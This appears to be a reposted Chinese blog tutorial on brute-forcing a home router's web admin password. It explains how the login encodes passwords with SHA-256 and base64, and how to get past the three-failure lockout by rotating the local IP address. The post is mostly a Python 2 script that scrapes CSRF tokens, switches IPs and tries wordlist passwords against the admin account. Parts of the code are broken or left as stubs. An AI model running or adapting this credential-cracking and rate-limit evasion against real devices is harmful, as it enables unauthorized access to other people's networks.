“登录3次错误,等待一分钟”的限制?在Python眼…
2018-08-14 10:06:05来源:博客园 阅读 ()
晕,心想web界面还可以进去,而且无线wifi也可以看到SSID,应该主要功能还是可以用的。功能看起来挺多的,所以就想看看,在网上查找通用密码找了好多,一一尝试过,都没有用。那么就用最没技术含量的爆破试试。进群:548377875 即可获取数十套PDF哦!
分析过程
抓包
1、打开路由的web页面:192.168.3.1,路由器返回
3、路由器返回数据
{"errorCategory":"user_pass_err","csrf_param":"gn73LuAQ4GxsQkWLdpDVSDKcxinFbli","count":1,"csrf_token":"gu/bK/YjwYBL/uFQEA+v1W2oOz5fARI"}
密码的生成方法
从上面抓包的结果来看,Password字段是经过加密的,所以如果我们要暴力破解,需要把这个password的生成算法找出来。
打开web登录页面,查看源代码,找找算法
绕过3次错误密码,等待一分钟的限制
在这里我使用修改IP地址的方式来加快暴力破解的速度。原理就是当一个ip地址的登录次数超过3次时,那就换下一个IP来登录页面,253个ip,每个ip可以过3个密码,253*3 = 759,每次可以测试759个密码,2分钟能过759个,1天1440分钟能测试54万多点密码,如果密码不复杂,差不多是可以跑出来的。
整理一下大概的流程
所有的数据都准备好了,下一步,就是开始写程序了。
核心代码:
import urllib
import json
import urllib2
import hashlib
import base64
import cookielib
import re
import os
import random
import time
g_cookie_str = '';
g_csrf_param = '';
g_csrf_token = '';
def encrpyt_password(my_org_pass):
# 256
hash_256 = hashlib.sha256()
hash_str = my_org_pass
hash_256.update(hash_str.encode('utf-8'))
hash_256_value = hash_256.hexdigest()
#base64
encodestr = base64.b64encode(hash_256_value.encode('utf-8')
return encodestr
pass;
def read_dic_from_file(path_str):
pass;
def change_my_ip(c_ip):
ip_last=c_ip
cmd = 'ifconfig eth1 192.168.3.' + str(ip_last);
a = os.popen(cmd);
pass;
def get_csrf_str(res_str):
global g_csrf_param,g_csrf_token;
key_param = r"<meta name="csrf_param" content=".+"/>"
key_token = r"<meta name="csrf_token" content=".+"/>"
pattern_key_param = re.compile(key_param)
pattern_token_param = re.compile(key_token)
key_param_str = pattern_key_param.findall(res_str)[0];
key_token_str = pattern_token_param.findall(res_str)[0];
key_cnt_s = "content="";
key_cnt_e = ""/>";
param_start = key_param_str.find(key_cnt_s);
param_end = key_param_str.find(key_cnt_e);
g_csrf_param = key_param_str[param_start+len(key_cnt_s):param_end];
token_start = key_token_str.find(key_cnt_s);
token_end = key_token_str.find(key_cnt_e);
g_csrf_token = key_token_str[token_start+len(key_cnt_s):token_end];
pass;
def get_cookie_str(res_info):
global g_cookie_str;
t_cookie_index = str(res_info['Set-Cookie']).find(';');
t_cookie = res_info['Set-Cookie'][0:t_cookie_index];
g_cookie_str = t_cookie + ';'
pass;
def parse_result(pass_str,rst_str,fd_other):
# {"errorCategory":"
error_param = ""errorCategory":".+","
pattern_error_param = re.compile(error_param);
last_ = pattern_error_param.findall(rst_str);
if( len(last_) > 0 ):
out_str = '[' + 'password:' + pass_str + '];' + last_[0] + ' ';
else:
out_str = '****[' + 'password:' + pass_str + '];' +rst_str + ' ';
fd_other.write(out_str);
print out_str
return out_str;
pass;
def get_some_info():
index_url = ' http://192.168.3.1 ';
c_headers = {}
c_headers['User-Agent'] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'
req = urllib2.Request(index_url,headers = c_headers);
try:
result = urllib2.urlopen(req) # get
if( 200 == result.getcode() ):
_res_info = result.info()
get_cookie_str(_res_info);
_res = result.read() #
get_csrf_str(_res) #
else:
print 'get_some_info error!'
result.close()
except urllib2.HTTPError, e:
print "Error Code:", e.code
except urllib2.URLError, e:
print "Error Reason:", e.reason
pass;
def check_password(user_str , pass_str , log_handle,fd_other,c_ip):
host_url = ' http://192.168.3.1/api/system/user_login '
headers = {}
headers['Referer'] = ' http://192.168.3.1/ ';
headers['User-Agent'] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'
headers['Cookie'] = g_cookie_str + 'username =' + user_str;
headers['Content-Type'] = 'application/json;charset=UTF-8'
post_data={
"csrf":{"csrf_param":g_csrf_param,"csrf_token":g_csrf_token},
"data":{"UserName":user_str,"Password":encrpyt_password(pass_str)}
};
post = []
post.append(post_data)
data = json.dumps(post_data) #urllib.urlencode(post_data);
request = urllib2.Request(host_url,headers = headers,data = data)
try:
ret_three_time = 0;
response = urllib2.urlopen(request)
rst_str = response.read();
if (rst_str.find('user_pass_err') > 0):
out_str = '[' + 'password:' + pass_str + '];' +rst_str + ' ';
elif (rst_str.find('Three_time_err') > 0):
ret_three_time = 1;
out_str = '[' + 'password:' + pass_str + '];' +rst_str + ' ';
else:
out_str = '****[' + 'password:' + pass_str + '];' +rst_str + ' ';
fd_other.write(out_str);
if 0 == ret_three_time:
log_handle.write(out_str);
response.close()
print out_str
return ret_three_time;
except urllib2.HTTPError, e:
print "Error Code:", e.code
except urllib2.URLError, e:
print "Error Reason:", e.reason
pass;
def main():
worldlist = read_dic_from_file('wordlist2.txt'); #字典文件
fd_log = open('./log.txt', 'a')
fd_other = open('./record.txt', 'a') #破解成功后的内容写入文件
no_use_ip = [];
c_ip = 0;
for one_password in worldlist:
pass_str = one_password;
while 1:
c_ip = gen_new_ip_num(c_ip);#生成一个新的ip
change_my_ip(c_ip); #切换ip
get_some_info(); #获取需要的参数
r3t = check_password('admin' , pass_str , fd_log,fd_other,c_ip);#发送post,验证密码
if 1 == r3t:
no_use_ip.append(c_ip);
if len(no_use_ip) > 250: #ip用完了?
time.sleep(60); #休息1分钟后,重试
no_use_ip = []; #清空ip地址
continue;
else:
break;
pass;
print 'over '
pass;
main();
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇:python 生成器
下一篇:git操作
- Django项目中使用qq第三方登录。 2019-08-13
- python day2-爬虫实现github登录 2019-08-13
- python爬虫学习之淘宝模拟登录 2019-08-13
- python第一天---我要入个门 2019-07-24
- faster-rcnn错误信息 : tensorflow.python.framework.error 2019-07-24
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash